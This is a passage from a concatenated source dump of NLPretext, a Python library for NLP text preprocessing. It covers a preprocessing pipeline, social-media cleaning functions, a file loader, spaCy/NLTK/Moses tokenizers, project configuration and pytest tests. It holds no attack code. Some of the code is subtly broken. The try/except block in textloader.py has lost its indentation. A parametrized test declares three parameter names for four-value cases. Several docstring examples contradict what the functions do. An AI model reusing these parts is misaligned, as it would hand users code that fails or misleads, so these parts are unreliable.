        """Initialize preprocessor object to apply all text transformation."""
        self.__operations = []
        self.pipeline = None

    def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:
        """
        Register a preprocessing operation (and its arguments) on the pipe.

        Parameters
        ----------
        operation : callable
            text preprocessing function
        args : dict of arguments
        """
        self.__operations.append({"operation": operation, "args": args})

    @staticmethod
    def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:
        """
        Build an sklearn pipeline from a list of registered operations.

        Parameters
        ----------
        operation_list : iterable
            list of __operations of preprocessing

        Returns
        -------
        sklearn.pipeline.Pipeline
        """
        steps = []
        for entry in operation_list:
            func = entry["operation"]
            steps.append((func.__name__, FunctionTransformer(func, kw_args=entry["args"])))
        return Pipeline(steps=steps)

    def run(self, text: str) -> str:
        """
        Apply the pipeline to ``text``.

        When no operation has been piped, a default social-media cleaning
        pipeline is used.

        Parameters
        ----------
        text : string
            text to preprocess

        Returns
        -------
        string
        """
        operations = self.__operations
        if not operations:
            default_operations = (
                remove_html_tags,
                remove_mentions,
                remove_emoji,
                remove_hashtag,
                remove_eol_characters,
                fix_bad_unicode,
                normalize_whitespace,
            )
            operations = [{"operation": func, "args": None} for func in default_operations]
        self.pipeline = self.build_pipeline(operations)
        return self.pipeline.transform(text)
================================================
FILE: nlpretext/py.typed
================================================
================================================
FILE: nlpretext/social/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/social/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Tuple
import emoji as _emoji
from nlpretext._config import constants
from nlpretext.basic.preprocess import normalize_whitespace
def remove_mentions(text: str) -> str:
    """
    Remove words preceded with a '@' and normalize the leftover whitespace.

    Parameters
    ----------
    text : str

    Returns
    -------
    string
    """
    return normalize_whitespace(constants.AT_PATTERN.sub("", text))
def extract_mentions(text: str) -> List[str]:
    """
    Extract words preceded with a '@'
    eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"].

    Parameters
    ----------
    text : str

    Returns
    -------
    list of strings
    """
    mentions: List[str] = constants.AT_PATTERN.findall(text)
    return mentions
def remove_html_tags(text: str) -> str:
    """
    Remove spans enclosed between < and > and normalize the leftover
    whitespace.

    Parameters
    ----------
    text : str

    Returns
    -------
    string
    """
    return normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text))
def remove_emoji(text: str) -> str:
    """
    Remove emoji from any str by stripping any unicode in the range of Emoji
    unicode as defined in the unicode convention:
    http://www.unicode.org/emoji/charts/full-emoji-list.html.

    Parameters
    ----------
    text : str

    Returns
    -------
    str
    """
    return _emoji.replace_emoji(text, "")
# NOTE: `convert_emoji_to_text` uses an immutable tuple as its default
# `code_delimiters`, so the mutable-default-argument anti-pattern
# (https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html)
# does not apply here.
def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str:
    """
    Convert emoji to their CLDR Short Name, according to the unicode convention
    http://www.unicode.org/emoji/charts/full-emoji-list.html
    eg. 😀 --> :grinning_face:

    Parameters
    ----------
    text : str
    code_delimiters : tuple of symbols around the emoji code.
        eg: (':',':') --> :grinning_face:

    Returns
    -------
    str
        string
    """
    demojized: str = _emoji.demojize(text, delimiters=code_delimiters)
    return demojized
def extract_emojis(text: str) -> List[str]:
    """
    Extract emojis from a text and translate them into words
    eg. "I take care of my skin 😀 :(" --> [":grinning_face:"].

    Parameters
    ----------
    text : str

    Returns
    -------
    list
        list of all emojis converted with their unicode conventions
    """
    return [
        convert_emoji_to_text(found.get("emoji", ""))
        for found in _emoji.emoji_list(text)
    ]
def extract_hashtags(text: str) -> List[str]:
    """
    Extract words preceded with a '#'
    eg. "I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"].

    Parameters
    ----------
    text : str

    Returns
    -------
    list
        list of all hashtags
    """
    hashtags: List[str] = constants.HASHTAG_PATTERN.findall(text)
    return hashtags
def remove_hashtag(text: str) -> str:
    """
    Remove words preceded with a '#'
    eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin".

    Parameters
    ----------
    text : str

    Returns
    -------
    str
        text of a post without hashtags
    """
    return normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text))
================================================
FILE: nlpretext/textloader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from types import ModuleType
from typing import Any, List, Optional, Union
import sys
import warnings
import pandas as pd
try:
from nlpretext._utils import daskloader
except ImportError:
warnings.warn(
"Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]", # noqa: E501
stacklevel=2,
)
from nlpretext._utils import pandasloader
from nlpretext._utils.file_loader import check_text_file_format
from nlpretext.preprocessor import Preprocessor
class TextLoader:
    def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True):
        """
        Initialize DataLoader object to retrieve text data.

        Parameters
        ----------
        text_column: string
            name of the column containing texts in json / csv / parquet files
        encoding: string
            encoding of the text to be loaded, can be utf-8 or latin-1 for example
        file_format: string | None
            format of the files to be loaded
        use_dask: bool
            use dask to load text
        """
        self.text_column = text_column
        self.encoding = encoding
        self.file_format = file_format
        self.use_dask = use_dask
        self.loader: ModuleType
        if self.use_dask:
            # The module-level import of daskloader may have failed; only use
            # dask if it was actually imported.
            if "dask" in sys.modules:
                self.loader = daskloader
            else:
                warnings.warn(
                    "Dask is not installed, switching to pandas. Run pip install dask to use dask",
                    stacklevel=2,
                )
                self.use_dask = False
                self.loader = pandasloader
        else:
            self.loader = pandasloader

    def __repr__(self):
        """Method to represent class attributes."""
        class_repr_dict = {
            "text_column": self.text_column,
            "encoding": self.encoding,
            "file_format": self.file_format,
            "use_dask": self.use_dask,
        }
        return f"TextLoader({class_repr_dict})"

    def _read_text_txt(self, files_path):
        """
        Read txt text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_text(files_path, encoding=self.encoding)
        # Raw text files have no header: name the single column explicitly.
        text_ddf.columns = [self.text_column]
        return text_ddf

    def _read_text_json(self, files_path):
        """
        Read json text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_json(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def _read_text_csv(self, files_path):
        """
        Read csv text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def _read_text_parquet(self, files_path):
        """
        Read parquet text files stored in files_path.

        Parameters
        ----------
        files_path : string | list[string]
            single or multiple files path

        Returns
        -------
        dask.dataframe | pandas.DataFrame
        """
        text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)
        try:
            return text_ddf[[self.text_column]]
        except KeyError as e:
            raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e

    def read_text(
        self,
        files_path: Union[str, List[str]],
        file_format: Optional[str] = None,
        encoding: Optional[str] = None,
        compute_to_pandas: bool = True,
        preprocessor: Optional[Preprocessor] = None,
    ) -> Union[pd.DataFrame, Any]:
        """
        Read the text files stored in files_path.

        Parameters
        ----------
        files_path: string | list[string]
            single or multiple files path
        file_format: string
            Format of the files to be loaded, to be selected among csv, json, parquet or txt
        encoding:
            encoding of the text to be loaded, can be utf-8 or latin-1 for example
        compute_to_pandas: bool
            True if user wants Dask Dataframe to be computed as pandas DF, False otherwise
        preprocessor: nlpretext.preprocessor.Preprocessor
            NLPretext preprocessor can be specified to pre-process text after loading

        Returns
        -------
        dask.dataframe | pandas.DataFrame

        Raises
        ------
        ValueError
            if the file format is not handled, or if ``preprocessor`` is not
            an NLPretext Preprocessor.
        """
        if encoding is not None:
            self.encoding = encoding
        if file_format is not None:
            self.file_format = file_format
        else:
            # Infer the format from the file paths when not given explicitly.
            self.file_format = check_text_file_format(files_path)
        reader_mapping = {
            "csv": self._read_text_csv,
            "txt": self._read_text_txt,
            "json": self._read_text_json,
            "parquet": self._read_text_parquet,
        }
        reader = reader_mapping.get(self.file_format)
        if reader is None:
            raise ValueError("Format not handled")
        text = reader(files_path)
        if preprocessor is not None:
            if isinstance(preprocessor, Preprocessor):
                # Removed leftover debug prints of text.head() around this call.
                text[self.text_column] = text[self.text_column].apply(preprocessor.run)
            else:
                raise ValueError("Only NLPretext preprocessors can be specified")
        if compute_to_pandas and self.use_dask:
            # Materialize the lazy dask dataframe into pandas.
            return text.compute()
        return text
================================================
FILE: nlpretext/token/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/token/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Optional
import re
from nlpretext._utils.stopwords import get_stopwords
def remove_stopwords(
    tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None
) -> List[str]:
    """
    Remove stopwords from a list of tokens.
    eg. 'I like when you move your body !' -> 'I move body !'.

    Parameters
    ----------
    tokens: list(str)
        list of tokens
    lang: str
        language iso code (e.g : "en")
    custom_stopwords : list(str)|None
        list of custom stopwords to add. None by default

    Returns
    -------
    list
        tokens without stopwords
    """
    # Copy before extending: get_stopwords may return a shared/cached list,
    # and extending it in place would leak custom stopwords into later calls.
    stopwords = list(get_stopwords(lang))
    if custom_stopwords:
        stopwords += custom_stopwords
    # Set membership is O(1) versus O(n) per token on the list.
    stopwords_set = set(stopwords)
    return [word for word in tokens if word not in stopwords_set]
def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
    """
    Filter out tokens containing any character that is not an ASCII letter
    (digits, punctuation, ...).
    ['foo','bar','124','34euros'] -> ['foo','bar'].

    Parameters
    ----------
    tokens : list
        list of tokens to be cleaned

    Returns
    -------
    list
        list of tokens without tokens with numbers
    """
    non_letter = re.compile("[^a-zA-Z]")
    return [word for word in tokens if non_letter.search(word) is None]
def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
    """
    Remove tokens that contain neither a letter nor a digit.
    eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].

    Parameters
    ----------
    tokens : list
        list of tokens to be cleaned

    Returns
    -------
    list
        list of tokens without tokens made only of special characters
    """
    has_alnum = re.compile("[a-zA-Z0-9]")
    return [word for word in tokens if has_alnum.search(word)]
def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
    """
    Remove words whose length is less than or equal to a threshold
    ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].

    Parameters
    ----------
    tokens : list
        list of strings
    smallwords_threshold: int
        threshold of small word

    Returns
    -------
    list
    """
    return [word for word in tokens if len(word) > smallwords_threshold]
================================================
FILE: nlpretext/token/tokenizer.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="assignment"
from typing import Any, List, Optional, Union
import os
import re
import nltk
import spacy
from sacremoses import MosesDetokenizer, MosesTokenizer
# Pattern matching official spaCy model names (e.g. "en_core_web_sm");
# used to decide whether a missing model can be auto-downloaded.
MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
# Tokenization backends accepted by `tokenize`, as "<lang>_<library>".
SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}
class LanguageNotHandled(Exception):
    """Raised when no spaCy model is available for the requested language."""

    pass
class LanguageNotInstalledError(Exception):
    """Raised when a spaCy model is missing and cannot be auto-downloaded."""

    pass
class SpacyModel:
    """Holder for a single spaCy language model, cached at class level.

    NOTE(review): the model is stored on the class, so the language of the
    FIRST instantiation wins — later instantiations with a different ``lang``
    reuse the already-loaded model. Confirm this is intended before relying
    on multi-language use in one process.
    """

    class SingletonSpacyModel:
        """Builds the spaCy model for the requested language."""

        def __init__(self, lang: str) -> None:
            self.lang = lang
            if lang == "en":
                self.model = _load_spacy_model("en_core_web_sm")
            elif lang == "fr":
                self.model = _load_spacy_model("fr_core_news_sm")
            elif lang == "ko":
                # Korean and Japanese use blank pipelines (tokenizer only).
                self.model = spacy.blank("ko")
            elif lang == "ja":
                self.model = spacy.blank("ja")
            else:
                raise (LanguageNotHandled("This spacy model is not available"))

    # Class-level cache shared by every SpacyModel instance.
    model: Optional[spacy.language.Language] = None

    def __init__(self, lang):
        # Load the model only once; subsequent calls reuse the cached one.
        if not SpacyModel.model:
            SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model

    def get_lang_model(self) -> Optional[str]:  # noqa: D102
        # Return the ISO language code of the cached model, or None if no
        # model has been loaded yet.
        if self.model:
            lang: str = self.model.lang
            return lang
        return None
def _load_spacy_model(model: str) -> Any:
    """Load a spaCy model, downloading official pipelines on first use.

    Parameters
    ----------
    model : str
        Name of the spaCy pipeline to load (e.g. "en_core_web_sm").

    Returns
    -------
    Any
        The loaded spaCy ``Language`` pipeline.

    Raises
    ------
    LanguageNotInstalledError
        If the model is not installed and its name does not match an
        official spaCy pipeline that can be downloaded automatically.
    """
    try:
        return spacy.load(model)
    except OSError as e:
        if MODEL_REGEX.match(model):
            # Official pipeline name: download it with the running
            # interpreter. An argument list (no shell) avoids command
            # injection, and check=True surfaces download failures instead
            # of silently ignoring the exit status as os.system did.
            import subprocess
            import sys

            subprocess.run(  # nosec
                [sys.executable, "-m", "spacy", "download", model], check=True
            )
            return spacy.load(model)
        raise LanguageNotInstalledError(
            f"Model {model} is not installed. "
            f"To install, run: python -m spacy download {model}"
        ) from e
def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
    """
    Return the spaCy tokenizer matching the given language.

    Parameters
    ----------
    lang : str
        Language in which text is written. Languages handled : ["en", "fr", "ko", "ja"]

    Returns
    -------
    spacy.tokenizer.Tokenizer
        spacy tokenizer, or None when no model could be obtained
    """
    loaded_model = SpacyModel(lang).model
    return loaded_model.tokenizer if loaded_model else None
def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
    """
    Convert text to a list of tokens.

    Parameters
    ----------
    text : str
        Text to tokenize.
    lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
        choose the tokenization module according to the language and the
        implementation. Recommended: spaCy (faster, better results). To
        process other languages import models.Spacy_models

    Returns
    -------
    list
        list of string

    Raises
    ------
    ValueError
        If lang_module is not a valid module name
    """
    if lang_module not in SUPPORTED_LANG_MODULES:
        raise ValueError(
            f"Invalid lang_module: {lang_module}. "
            f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
        )
    tokenized_words: List[str] = []
    # The guard above makes the three branches mutually exclusive.
    if "spacy" in lang_module:
        lang = lang_module.split("_")[0]
        spacy_tokenizer = _get_spacy_tokenizer(lang)
        if spacy_tokenizer:
            tokenized_words = [spacy_token.text for spacy_token in spacy_tokenizer(text)]
    elif lang_module == "en_nltk":
        tokenized_words = nltk.word_tokenize(text)
    elif lang_module == "fr_moses":
        tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)
    return tokenized_words
def untokenize(tokens: List[str], lang: str = "fr") -> str:
    """
    Join a list of tokens back into a single string.

    ["J'", 'ai'] >>> "J' ai".

    Parameters
    ----------
    tokens : list of str
        Tokens to reassemble.
    lang : string
        language code

    Returns
    -------
    string
        text
    """
    detokenizer = MosesDetokenizer(lang=lang)
    result: str = detokenizer.detokenize(tokens, unescape=False)
    return result
def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str:
    """Return the input as one string: lists are detokenized, None becomes ""."""
    if tokens_or_str is None:
        return ""
    if isinstance(tokens_or_str, list):
        return untokenize(tokens_or_str)
    if isinstance(tokens_or_str, str):
        return tokens_or_str
    raise TypeError("Please input string or tokens")
def convert_string_to_tokens(
    tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
) -> List[str]:
    """Return the input as a token list: strings are tokenized, None becomes []."""
    if tokens_or_str is None:
        return []
    if isinstance(tokens_or_str, list):
        return tokens_or_str
    if isinstance(tokens_or_str, str):
        return tokenize(tokens_or_str, lang_module=lang_module)
    raise TypeError("Please input string or tokens")
================================================
FILE: pyproject.toml
================================================
# Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/
[build-system]
requires = ["poetry_core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
[tool.poetry]
name = "nlpretext"
version = "1.2.2"
description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext"
readme = "README.md"
authors = [
"artefactory "
]
license = "Apache Software License 2.0"
repository = "https://github.com/artefactory/NLPretext"
homepage = "https://github.com/artefactory/NLPretext"
# Keywords description https://python-poetry.org/docs/pyproject/#keywords
keywords = [] # Update me
# Pypi classifiers: https://pypi.org/classifiers/
classifiers = [ # Update me
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
]
[tool.poetry.scripts]
# Entry points for the package https://python-poetry.org/docs/pyproject/#scripts
"nlpretext" = "nlpretext.cli.__main__:app"
[tool.poetry.dependencies]
python = ">=3.8,<3.11"
typer = {extras = ["all"], version = ">=0.3.2"}
rich = ">=10.1"
chardet = ">=3.0.4"
emoji = ">=2.0.0"
flashtext = ">=2.7"
ftfy = ">=4.2.0"
mosestokenizer = ">=1.1.0"
nlpaug = ">=1.0.1"
nltk = ">=3.4.2"
numpy = "^1.22"
phonenumbers = ">=8.10.12"
regex = ">=2019.8.19"
sacremoses = ">=0.0.13"
scikit-learn = ">=0.23.2, <2"
spacy = ">=3.0.5"
pillow = ">=8.2.1"
thinc = ">=8.0.4"
stop-words = ">=2018.7.23"
pandas = ">=1.3,<3.0"
pyarrow = ">=4.0.0"
fastparquet = ">=0.4.1"
dask = {version = ">=2021.5.0", extras = ["complete"], optional = true}
distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true}
tornado = ">=6.0.3"
torch = {version = "^1.9.0", optional = true}
[tool.poetry.group.dev.dependencies]
isort = ">=5.8.0"
pyupgrade = ">=2.12.0"
black = ">=20.8b1"
ruff = "^0.1.5"
mypy = ">=0.812"
bandit = ">=1.7.0"
safety = ">=1.10.3"
pytest = ">=6.2.1"
pytest-cov = ">=2.10.1"
coverage = ">=5.3"
pre-commit = ">=2.12.0"
mypy-extensions = ">=0.4.3"
types-emoji = ">=1.2.2"
types-chardet = ">=0.1.3"
types-click = ">=7.1.2"
[tool.poetry.group.docs.dependencies]
nbsphinx = ">=0.8.0"
notebook = ">=6.1.5"
Pygments = ">=2.8.0"
recommonmark = ">=0.7.1"
Sphinx = ">=3.5.4"
sphinx-gallery = ">=0.8.1"
sphinxcontrib-applehelp = ">=1.0.2"
sphinxcontrib-devhelp = ">=1.0.2"
sphinxcontrib-htmlhelp = ">=1.0.3"
sphinxcontrib-jsmath = ">=1.0.1"
sphinxcontrib-qthelp = ">=1.0.3"
sphinxcontrib-serializinghtml = ">=1.1.4"
sphinx-autodoc-typehints = ">=1.11.1"
sphinx_rtd_theme = ">=0.5.2"
sphinx-multiversion-pre-post-build = ">=0.2.4"
[tool.poetry.extras]
torch = ["torch"]
dask = ["dask", "distributed"]
[tool.black]
# https://github.com/psf/black
line-length = 100
target-version = ["py38"]
[tool.isort]
# https://github.com/timothycrosley/isort/
profile = "black"
known_typing = "typing,types,typing_extensions,mypy,mypy_extensions"
sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER"
default_section = "FIRSTPARTY"
force_grid_wrap = 0
line_length = 100
[tool.ruff]
ignore = [
"D100",
"D101",
"D106",
"D205",
"D400",
"D415",
"D401",
]
line-length = 100
select = ["B", "C", "D", "E", "F", "W"]
[tool.ruff.pydocstyle]
convention = "numpy"
[tool.ruff.per-file-ignores]
"*cli.py" = ["D", "B008"]
"*__init__.py" = [
"F401",
"D100",
"D101",
"D103",
"D104",
"D105",
"D106",
"D107",
]
"tests/*" = ["D", "E501"]
================================================
FILE: references/.gitkeep
================================================
================================================
FILE: tests/__init__.py
================================================
================================================
FILE: tests/test_data_augmentation.py
================================================
import pytest
from nlpretext.augmentation.text_augmentation import (
CouldNotAugment,
UnavailableAugmenter,
get_augmenter,
process_entities_and_text,
)
@pytest.mark.parametrize(
    "text, text_augmented, entities",
    [
        (
            "I want to buy a small black handbag.",
            "I want to acquire a small black handbag",
            [
                {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
                {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
                {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
            ],
            {"type": str, "entities": ["black", "handbag", "small"]},
        ),
        (
            "I want to buy a small black handbag.",
            "I would like to buy a black small handbag",
            [
                {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
                {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
                {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
            ],
            {"type": str, "entities": ["black", "handbag", "small"]},
        ),
    ],
)
def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):
    """When the augmenter preserves all entity words, they must all be relocated."""
    augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)
    augmented_entities = sorted(el["word"] for el in augmented_entities)
    assert {"type": type(augmented_text), "entities": augmented_entities} == expected
@pytest.mark.parametrize(
    "text, text_augmented, entities",
    [
        (
            "I live in New York and I am looking for a lipstick",
            "I live in New and York I an looking for a lipstick",
            [
                {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18},
                {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50},
            ],
        )
    ],
)
def test_process_entities_and_text_altered(text, text_augmented, entities):
    """Augmentation must raise CouldNotAugment when entity words were altered."""
    with pytest.raises(CouldNotAugment) as excinfo:
        process_entities_and_text(entities, text, text_augmented)
    assert (
        str(excinfo.value) == "Text was not correctly augmented because entities were altered"
    )
def test_get_augmenter():
    """An unsupported augmentation method must raise UnavailableAugmenter."""
    method = "ppdb_synonym"
    with pytest.raises(UnavailableAugmenter) as excinfo:
        get_augmenter(method)
    assert (
        str(excinfo.value)
        == "The given augmenter is not supported. You must choose one \
of the following: wordnet_synonym or aug_sub_bert"
    )
================================================
FILE: tests/test_file_loader.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import os
import re
import numpy as np
import pytest
from nlpretext._utils.file_loader import check_text_file_format, detect_encoding
# Sample sentences used to create latin-1 and utf-8 encoded fixture files.
TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!"
TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!"
def create_files():
    """Write the latin-1 and utf-8 fixture files into the working directory."""
    with open("testdoc_latin1.txt", "wb") as latin1_file:
        latin1_file.write(TESTDOC_LATIN1.encode("latin-1"))
    with open("testdoc_utf8.txt", "wb") as utf8_file:
        utf8_file.write(TESTDOC_UTF8.encode("utf-8"))
    return True
def test_detect_encoding():
    """detect_encoding should identify the latin-1 fixture as ISO-8859-1."""
    create_files()
    # NOTE(review): the exact confidence (0.73) comes from the installed
    # chardet version and may break on upgrade — confirm pinning.
    expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""}
    result = detect_encoding("testdoc_latin1.txt")
    np.testing.assert_equal(result, expected)
    remove_files()
def remove_files():
    """Delete the fixture files written by ``create_files``."""
    for filename in ("testdoc_latin1.txt", "testdoc_utf8.txt"):
        os.remove(filename)
@pytest.mark.parametrize(
    "input_filepath, raising, expected_str",
    [
        ("hello.csv", False, "csv"),
        ("folder/hello.csv", False, "csv"),
        ("gs://folder/hello.csv", False, "csv"),
        ("s3://folder/hello.csv", False, "csv"),
        ("hdfs://folder/hello.csv", False, "csv"),
        ("az://folder/hello.csv", False, "csv"),
        ("wildcards/*.csv", False, "csv"),
        ("compressed/gz/text.csv.gz", False, "csv"),
        ("compressed/zip/text.csv.zip", False, "csv"),
        (["hello.csv"], False, "csv"),
        (["hello.csv", "compressed.csv.gz"], False, "csv"),
        (["hello.csv", "other/folder/hello.csv"], False, "csv"),
        ("hello.json", False, "json"),
        ("folder/hello.json", False, "json"),
        ("gs://folder/hello.json", False, "json"),
        (["hello.json", "folder/hello.json"], False, "json"),
        ("hello.txt", False, "txt"),
        ("folder/hello.txt", False, "txt"),
        ("gs://folder/hello.txt", False, "txt"),
        (["hello.txt", "gs://folder/hello.txt"], False, "txt"),
        ("hello.parquet", False, "parquet"),
        ("folder/hello.parquet", False, "parquet"),
        ("gs://folder/hello.parquet", False, "parquet"),
        (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"),
        (
            "gs://folder/hello.notaformat",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "gs://folder/hello.gz",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "gs://folder/hello.zip",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            "folder/*",
            True,
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted",
        ),
        (
            ["hello.txt", "gs://folder/hello.csv"],
            True,
            re.escape("Multiple file formats found in file path list: ['txt', 'csv']"),
        ),
    ],
)
def test_check_text_file_format(input_filepath, raising, expected_str):
    """Format detection handles local/cloud paths, wildcards, compression and lists."""
    if raising:
        # expected_str doubles as the pytest.raises match pattern here.
        with pytest.raises(ValueError, match=expected_str):
            check_text_file_format(input_filepath)
    else:
        result = check_text_file_format(input_filepath)
        assert result == expected_str
================================================
FILE: tests/test_phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
